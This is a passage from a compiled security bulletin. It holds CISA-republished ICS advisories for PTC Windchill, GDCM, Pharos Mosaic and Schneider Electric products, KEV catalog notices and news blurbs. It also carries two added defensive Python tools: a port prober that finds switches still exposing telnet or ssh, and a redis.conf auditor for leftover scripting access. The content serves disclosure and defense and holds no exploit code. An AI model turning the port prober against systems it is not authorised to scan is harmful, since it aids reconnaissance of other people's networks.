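        return host, [name for port, name in ports.items() if port_open(host, port, timeout)]
    with ThreadPoolExecutor(max_workers=32) as pool:
        return dict(pool.map(probe, hosts))


def still_exposed(report: dict) -> list:
    """Hosts that still answer on a remote CLI port, sorted for a ticket or a CI gate."""
    return sorted(host for host, services in report.items() if services)


def demo() -> dict:
    """Offline self-check: a loopback listener stands in for a switch with telnet still enabled."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                      # released again, so nothing listens there during the probe
    try:
        return audit_remote_cli(["127.0.0.1"], ports={open_port: "telnet", closed_port: "ssh"})
    finally:
        listener.close()


if __name__ == "__main__":
    # Real use, with the switch management addresses substituted (assumed placeholder addresses):
    # print(still_exposed(audit_remote_cli(["10.0.10.11", "10.0.10.12"])))
    print(demo())
```

Run it from a host that sits on the same management segment the attacker would have to reach; a clean result from a host the firewall already blocks proves nothing. Repeat it after every firmware update, since a reset to factory defaults can re-enable the services.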

0
PTC Windchill Product Lifecycle Management

Summary

Successful exploitation of this vulnerability could allow an attacker to achieve remote code execution.

Affected versions of PTC Windchill Product Lifecycle Management (all CVE-2026-4681):
Windchill PDMLink: 11.0_M030, 11.1_M020, 11.2.1.0, 12.0.2.0, 12.1.2.0, 13.0.2.0, 13.1.0.0, 13.1.1.0, 13.1.2.0, 13.1.3.0
FlexPLM: 11.0_M030, 11.1_M020, 11.2.1.0, 12.0.0.0, 12.0.2.0, 12.0.3.0, 12.1.2.0, 12.1.3.0, 13.0.2.0, 13.0.3.0

CVSS v3 10 | Vendor: PTC | Equipment: PTC Windchill Product Lifecycle Management | Vulnerability: Improper Control of Generation of Code ('Code Injection')

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerability: CVE-2026-4681
A critical remote code execution (RCE) vulnerability has been reported in PTC Windchill and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data. It affects the Windchill PDMLink and FlexPLM versions listed above.
Relevant CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSS v3.1 base score 10 (CRITICAL), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Two points matter for triage: the vector is unauthenticated, network-reachable and scope-changing, and no patch exists yet, so the web-server configuration workaround is the only control PTC offers. Note also that the CVE text attributes the flaw to deserialization of untrusted data while the advisory files it under CWE-94; do not let the CWE label steer detection away from deserialization-style payloads at the HTTP front end.

Affected Products
Vendor: PTC. Product status: known_affected for every version listed above.

Remediations
PTC is aware of the issue and is actively developing a fix. In the meantime, PTC recommends applying the recommended workaround; until official patches are available, customers must take urgent steps to safeguard their environments:
- Protect any publicly accessible Windchill systems. These are at higher risk and require immediate attention, but PTC strongly recommends applying the mitigation steps to all deployments, regardless of Internet exposure.
- Apply the same precautions to FlexPLM deployments.
- Apply the Apache HTTP Server or Microsoft IIS configuration update IMMEDIATELY to every Windchill or FlexPLM system. Customers using Apache HTTP Server should follow only the "Apache HTTP Server Configuration – Workaround Steps" section; customers using Microsoft IIS should follow only the "IIS Configuration - Workaround Steps" section.
- The same mitigation steps must also be applied on File Server / Replica Server configurations where applicable.
- For Windchill releases prior to 11.0 M030, the workarounds may need to be altered to apply to those unsupported releases.
The Apache HTTP Server and IIS workaround steps, and additional guidance and remediation options if immediate remediation is not feasible, are in PTC's advisory: https://www.ptc.com/en/about/trust-center/advisory-center/active-advisories/windchill-flexplm-critical-vulnerability

Acknowledgments: An anonymous source reported this vulnerability to CISA.

Legal Notice and Terms of Use: as for the advisories above (https://www.cisa.gov/notification, https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA's standard defensive measures for control systems apply; they are reproduced in full in the PX4 Autopilot advisory above (minimize network exposure, place control system networks behind firewalls and isolate them from business networks, use up-to-date VPNs for remote access, and guard against social engineering). Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-26
2026-03-26  Revision 1  Initial Republication of PTC's CS466318

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
* CVE-2026-33634 Aqua Security Trivy Embedded Malicious Code Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Blame Game: Why Public Cyber Attribution Carries Risks

Publicly accusing an entity of a cyberattack could have negative consequences that organizations should consider before taking the plunge.

SANS: Top 5 Most Dangerous New Attack Techniques to Watch

For the first time, SANS Institute's five top attack techniques all have one thing in common — AI.

Why a 'Near-Miss' Database Is Key to Improving Information Sharing

Organizations disclose attack details, though information may be limited. What if they did the same with close calls?

AI-Native Security Is a Must to Counter AI-Based Attacks

Attacks by artificial intelligence agents are a reality. Experts at Nvidia's GTC conference say defenders need to use the same tools to fight them off.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
* CVE-2026-33017 Langflow Code Injection Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Ex-NSA Directors Discuss 'Red Line' for Offensive Cyberattacks

Four former NSA chiefs representing a near-complete history of US Cyber Command debate the role of offensive cyber in the government at RSAC.

Iran Hacktivists Make Noise but Have Little Impact on War

Iran-aligned groups are trying to make their mark in the Gulf, but the results have fallen short of remarkable.

Grassroots DICOM (GDCM)

Summary
Successful exploitation of this vulnerability could allow an attacker to send a specially crafted file which, when parsed, could result in a denial-of-service condition.
The following versions of Grassroots DICOM (GDCM) are affected:
* Grassroots DICOM (GDCM) 3.2.2 (CVE-2026-3650)
CVSS v3: 7.5 | Vendor: Grassroots | Equipment: Grassroots DICOM (GDCM) | Vulnerability: Missing Release of Memory after Effective Lifetime

Background
Critical Infrastructure Sectors: Healthcare and Public Health
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities
CVE-2026-3650: A memory leak exists in the Grassroots DICOM library (GDCM). The bug occurs when parsing malformed DICOM files with non-standard VR types in the file meta information. The vulnerability leads to vast memory allocations and resource depletion, triggering a denial-of-service condition. A maliciously crafted file can fill the heap in a single read operation without the memory being properly released.

Affected Products
Grassroots DICOM (GDCM) (Vendor: Grassroots)
* Grassroots DICOM (GDCM): 3.2.2
Product Status: known_affected

Remediations
The maintainer of Grassroots DICOM (GDCM) has not responded to requests to work with CISA to mitigate this vulnerability. For update information, refer to the software page on SourceForge: https://sourceforge.net/projects/gdcm/

Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime

Metrics
CVSS v3.1 Base Score: 7.5 (HIGH)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Acknowledgments
Volodymyr Bihunenko, Mykyta Mudryi, and Markiian Chaklosh of ARIMLABS reported this vulnerability to CISA.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-24
* 2026-03-24, Revision 1: Initial Publication

Pharos Controls Mosaic Show Controller

Summary
Successful exploitation of this vulnerability could allow an unauthenticated attacker to execute arbitrary commands with root privileges.
The following versions of Pharos Controls Mosaic Show Controller are affected:
* Mosaic Show Controller Firmware 2.15.3 (CVE-2026-2417)
CVSS v3: 9.8 | Vendor: Pharos Controls | Equipment: Pharos Controls Mosaic Show Controller | Vulnerability: Missing Authentication for Critical Function

Background
Critical Infrastructure Sectors: Commercial Facilities
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United Kingdom

Vulnerabilities
CVE-2026-2417: A Missing Authentication for Critical Function vulnerability in Pharos Controls Mosaic Show Controller firmware version 2.15.3 could allow an unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

Affected Products
Pharos Controls Mosaic Show Controller (Vendor: Pharos Controls)
* Pharos Controls Mosaic Show Controller Firmware: 2.15.3
Product Status: known_affected

Remediations
Pharos Controls recommends that users upgrade Mosaic Show Controller to version 2.16 or later.

Relevant CWE: CWE-306 Missing Authentication for Critical Function

Metrics
CVSS v3.1 Base Score: 9.8 (CRITICAL)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Acknowledgments
James Tully reported this vulnerability to CISA.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-24
* 2026-03-24, Revision 1: Initial Publication

Schneider Electric EcoStruxure Foxboro DCS

Summary
Schneider Electric is aware of a vulnerability in its EcoStruxure Foxboro DCS Control Software on Foxboro DCS workstations and servers. Control Core Services and all runtime software, like FCPs, FDCs, and FBMs, are not affected.
The EcoStruxure Foxboro DCS (https://www.se.com/ww/en/product-range/63680-ecostruxure-foxboro-dcs/) product is an innovative family of fault-tolerant, highly available control components, which consolidates critical information and elevates staff capabilities to ensure flawless, continuous plant operation.
Failure to apply the remediation provided below may risk deserialization of untrusted data, which could result in loss of confidentiality, integrity and potential remote code execution on the compromised workstation.
The following versions of Schneider Electric EcoStruxure Foxboro DCS are affected:
* EcoStruxure Foxboro DCS (vers:generic/)
CVSS v3: 6.5 | Vendor: Schneider Electric | Equipment: Schneider Electric EcoStruxure Foxboro DCS | Vulnerability: Deserialization of Untrusted Data

Background
Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: France

Vulnerabilities
CVE-2026-1286: A deserialization of untrusted data vulnerability exists that could lead to loss of confidentiality, integrity and potential remote code execution on the workstation when an admin authenticated user opens a malicious project file.

Affected Products
Schneider Electric EcoStruxure Foxboro DCS (Vendor: Schneider Electric)
* EcoStruxure Foxboro DCS versions prior to CS8.1
Product Status: fixed, known_affected

Remediations
Vendor fix: Version CS 8.1 of EcoStruxure Foxboro DCS includes a fix for this vulnerability and is available through https://buyautomation.se.com/ . CS 8.1 requires FX-V3 licenses; standard upgrade procedures apply. A reboot is required for workstations and servers. Depending on the existing system version, online upgrade without production interruption might be possible. Schneider Electric recommends you work with your local field service representative or technical service consultant for further information.
Mitigation: If users choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit. The vulnerability is attacked with manipulated data brought onto the DCS computers from external sources. Examples of such data are:
* Configuration taglists
* DirectAccess Scripts
* Any partial or full Galaxy backups
* Library files
* Code snippets
* ASCII files of any sort
* Generally, any file that arrives on a DCS computer from outside the DCS computer.
Only use data from trusted sources, check for correct file name endings on data files, check for reasonable file sizes for any files coming to the system, and check structured data for any fields or columns which might be unexpected. Check for unusual manipulations of data within data files and reject files containing unexpected data or structures. Use secure communication channels and encrypt communications when communicating outside the site network. Avoid and ban removable media (e.g. USB sticks or drives). Minimize the number of users with engineering or administrative rights to DCS computers and ensure all interactions on DCS computers are executed with minimal user access rights. Consequently, isolating Foxboro DCS computers will help minimize the risk of this vulnerability being exploited.

Relevant CWE: CWE-502 Deserialization of Untrusted Data

Metrics
CVSS v3.1 Base Score: 6.5 (MEDIUM)
Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Acknowledgments
Schneider Electric reported this vulnerability to CISA.

General Security Recommendations
Schneider Electric strongly recommends the following industry cybersecurity best practices (https://www.se.com/us/en/download/document/7EN52-0390/):
* Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
* Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
* Place all controllers in locked cabinets and never leave them in the "Program" mode.
* Never connect programming software to any network other than the network intended for that device.
* Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
* Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
* Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
* When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document.

For More Information
This document provides an overview of the identified vulnerability or vulnerabilities and the actions required to mitigate them. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process.
For further information related to cybersecurity in Schneider Electric's products, visit the company's cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp

LEGAL DISCLAIMER
THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS "NOTIFICATION") ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN "AS-IS" BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION.

About Schneider Electric
Schneider's purpose is to create impact by empowering all to make the most of our energy and resources, bridging progress and sustainability for all. We call this Life Is On. Our mission is to be the trusted partner in sustainability and efficiency. We are a global industrial technology leader bringing world-leading expertise in electrification, automation and digitization to smart industries, resilient infrastructure, future-proof data centers, intelligent buildings, and intuitive homes. Anchored by our deep domain expertise, we provide integrated end-to-end lifecycle AI enabled industrial IoT solutions with connected products, automation, software and services, delivering digital twins to enable profitable growth for our customers. We are a people company with an ecosystem of 150,000 colleagues and more than a million partners operating in over 100 countries to ensure proximity to our customers and stakeholders. We embrace diversity and inclusion in everything we do, guided by our meaningful purpose of a sustainable future for all. www.se.com

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.
* Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
* Locate control system networks and remote devices behind firewalls and isolate them from business networks.
* When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Schneider Electric SEVD-2026-069-03 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider Electric directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-03-10
* 2026-03-10, Revision 1: Original Release
* 2026-03-13, Revision 2: Updated remediation and mitigations section.
* 2026-03-24, Revision 3: Initial CISA Republication of Schneider Electric Security Notification SEVD-2026-069-03

Schneider Electric Plant iT/Brewmaxx

Summary
Successful exploitation of these vulnerabilities could risk privilege escalation, which could result in remote code execution.
The following versions of Schneider Electric Plant iT/Brewmaxx are affected:
* Plant iT/Brewmaxx 9.60_and_above (CVE-2025-49844, CVE-2025-46817, CVE-2025-46818, CVE-2025-46819)
CVSS v3: 9.9 | Vendor: Schneider Electric | Equipment: Schneider Electric Plant iT/Brewmaxx | Vulnerabilities: Use After Free, Integer Overflow or Wraparound, Improper Control of Generation of Code ('Code Injection')

Background
Critical Infrastructure Sectors: Energy, Critical Manufacturing, Commercial Facilities
Countries/Areas Deployed: Worldwide
Company Headquarters Location: France

Vulnerabilities

CVE-2025-49844
The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, trigger a use-after-free, and potentially lead to remote code execution.
Affected Products: Schneider Electric Plant iT/Brewmaxx (Vendor: Schneider Electric), version 9.60_and_above. Product Status: known_affected.
Remediations: Schneider Electric recommends users immediately apply the following mitigations to reduce the risk of exploit:
* Install Patch ProLeiT-2025-001 via ProLeiT Support (https://www.proleit.com/support/).
* After installing ProLeiT-2025-001, disable the eval commands in Redis on the application server, VisuHub, engineering workstations, and workstations with emergency mode functionality.
* Force usage of secure Redis configuration templates in system settings as documented in the patch manual.
* Restart all patched servers and workstations.
Schneider Electric strongly recommends the following industry cybersecurity best practices (https://www.se.com/us/en/download/document/7EN52-0390/):
* Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
* Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
* Place all controllers in locked cabinets and never leave them in the "Program" mode.
* Never connect programming software to any network other than the network intended for that device.
* Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
* Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
* Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
* When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document.
Vendor fix: For more information, see Schneider Electric security notification "SEVD-2026-013-01 Multiple Third-Party Vulnerabilities on ProLeiT Plant iT/Brewmaxx": https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-013-01.pdf
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS v3.1 Base Score 9.9 (CRITICAL); Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE-2025-46817
The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to cause an integer overflow and potentially lead to remote code execution.
Affected Products: Schneider Electric Plant iT/Brewmaxx (Vendor: Schneider Electric), version 9.60_and_above. Product Status: known_affected.
Remediations: the same mitigations, best practices and vendor fix as listed for CVE-2025-49844 above (Patch ProLeiT-2025-001, disable the eval commands in Redis, force secure Redis configuration templates, restart all patched servers and workstations; see SEVD-2026-013-01).
Relevant CWE: CWE-190 Integer Overflow or Wraparound
Metrics: CVSS v3.1 Base Score 7 (HIGH); Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-46818
The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate different Lua objects and potentially run their own code in the context of another user.
Affected Products: Schneider Electric Plant iT/Brewmaxx (Vendor: Schneider Electric), version 9.60_and_above. Product Status: known_affected.
Remediations: the same mitigations, best practices and vendor fix as listed for CVE-2025-49844 above (Patch ProLeiT-2025-001, disable the eval commands in Redis, force secure Redis configuration templates, restart all patched servers and workstations; see SEVD-2026-013-01).
Relevant CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')
Metrics: CVSS v3.1 Base Score 6 (MEDIUM); Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N

CVE-2025-46819
The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to read out-of-bounds data or crash the server, resulting in a denial of service.
View CVE Details Affected Products Schneider Electric Plant iT/Brewmaxx Vendor: Schneider Electric Product Version: Schneider Electric Plant iT/Brewmaxx: 9.60_and_above Product Status: known_affected Remediations Mitigation Schneider Electric recommends users immediately apply the following mitigations to reduce the risk of exploit: Mitigation Install Patch ProLeiT-2025-001 via ProLeiT Support https://www.proleit.com/support/ Mitigation After installing ProLeiT-2025-001, disable the eval commands in Redis on the application server, VisuHub, engineering workstations, and workstations with emergency mode functionality Mitigation Force usage of secure Redis configuration templates in system settings as documented in the patch manual Mitigation Restart all patched servers and workstations Mitigation Schneider Electric strongly recommends the following industry cybersecurity best practices. Mitigation Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. Mitigation Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. Mitigation Place all controllers in locked cabinets and never leave them in the "Program" mode. Mitigation Never connect programming software to any network other than the network intended for that device. Mitigation Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. Mitigation Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. Mitigation Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. 
Mitigation When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. Mitigation For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document. https://www.se.com/us/en/download/document/7EN52-0390/ Vendor fix For more information, see Schneider Electric security notification "SEVD-2026-013-01 Multiple Third-Party Vulnerabilities on ProLeiT Plant iT/Brewmaxx" https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-013-01.pdf Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H Acknowledgments Schneider Electric reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. 
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-03-24 Date Revision Summary 2026-03-24 1 Initial Republication of SEVD-2026-013-01 Legal Notice and Terms of Use
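A way to verify that the "disable the eval commands in Redis" step above actually took hold, as an added example that is not Schneider Electric's, ProLeiT's or CISA's code: it audits a redis.conf text and reports every enabled user who can still reach a scripting command, since renaming EVAL alone leaves EVALSHA and SCRIPT LOAD usable. The command list and ACL category model follow Redis 7 documentation and are assumptions here; both configurations are constructed samples with placeholder passwords.

```python
"""Audit a redis.conf text for users who can still reach Redis' scripting commands.

Added example for the ProLeiT mitigation "disable the eval commands in Redis";
not vendor or CISA code. The command list and ACL category model are taken
from Redis 7 documentation (an assumption), and both configs are constructed.
"""

# Members of the @scripting ACL category in Redis 7 (assumption, per Redis docs).
SCRIPTING_COMMANDS = frozenset({"eval", "evalsha", "eval_ro", "evalsha_ro",
                                "script", "function", "fcall", "fcall_ro"})
# ACL categories that grant every scripting command: @all, @scripting, and
# @slow (Redis defines @slow as "every command that is not @fast").
GRANTING_CATEGORIES = frozenset({"all", "scripting", "slow"})


def _apply_rules(rules):
    """Replay ACL rule tokens left to right; return (enabled, allowed scripting commands).

    Only tokens that affect command permissions or the on/off state are
    interpreted; passwords (>..), key (~..) and channel (&..) patterns are skipped.
    """
    enabled, allowed = False, set()          # a fresh ACL user starts "off" with -@all
    for token in rules:
        rule = token.lower()
        if rule == "on":
            enabled = True
        elif rule == "off":
            enabled = False
        elif rule == "reset":                # reset = off, resetpass, resetkeys, -@all, ...
            enabled, allowed = False, set()
        elif rule in ("allcommands", "+@all"):
            allowed = set(SCRIPTING_COMMANDS)
        elif rule in ("nocommands", "-@all"):
            allowed = set()
        elif rule.startswith(("+@", "-@")):
            if rule[2:] in GRANTING_CATEGORIES:
                allowed = set(SCRIPTING_COMMANDS) if rule[0] == "+" else set()
        elif rule.startswith(("+", "-")):
            cmd, _, sub = rule[1:].partition("|")   # "+script|exists" -> ("script", "exists")
            if cmd not in SCRIPTING_COMMANDS:
                continue
            if rule[0] == "+":
                allowed.add(cmd)             # a sub-command grant is still flagged (conservative)
            elif not sub:
                allowed.discard(cmd)         # "-cmd|sub" narrows but does not remove the command
    return enabled, allowed


def audit_scripting(conf_text):
    """Return {user: scripting commands still reachable} for every enabled user.

    An empty set for every user means the mitigation holds. Commands disabled
    globally with `rename-command <CMD> ""` are removed for all users.
    """
    renamed_away, users = set(), {}
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        tokens = line.split()
        directive = tokens[0].lower()
        # Only the empty-name form disables a command; renaming to an obscure
        # name is not a control and is deliberately not credited here.
        if directive == "rename-command" and len(tokens) == 3 and tokens[2] in ('""', "''"):
            renamed_away.add(tokens[1].lower())
        elif directive == "user" and len(tokens) >= 2:
            users[tokens[1]] = tokens[2:]    # Redis rejects duplicate user lines; last wins here
    if "default" not in users:               # Redis' built-in default user: on, nopass, +@all
        users["default"] = ["on", "nopass", "~*", "&*", "+@all"]
    report = {}
    for name, rules in users.items():
        enabled, allowed = _apply_rules(rules)
        if enabled:
            report[name] = allowed - renamed_away
    return report


# Constructed sample: only EVAL is renamed away, so EVALSHA and SCRIPT LOAD
# (and the default user's implicit +@all) still expose script execution.
WEAK_CONF = """
requirepass placeholder-password
rename-command EVAL ""
user reporting on >placeholder-password ~* +@read +@slow
"""

# Constructed sample: scripting removed per user via ACL; "visuhub" keeps a
# SCRIPT sub-command, which the audit still surfaces for review.
HARDENED_CONF = """
user default on >placeholder-password ~* &* +@all -@scripting
user reporting on >placeholder-password ~* &* -@all +@read +get
user visuhub on >placeholder-password ~* &* +@all -@scripting +script|exists
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for user, exposed in sorted(audit_scripting(conf).items()):
            status = "OK" if not exposed else "EXPOSED: " + ", ".join(sorted(exposed))
            print(f"[{label}] {user}: {status}")
```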

0
A Vulnerability in Oracle Products Could Allow for Remote Code Execution

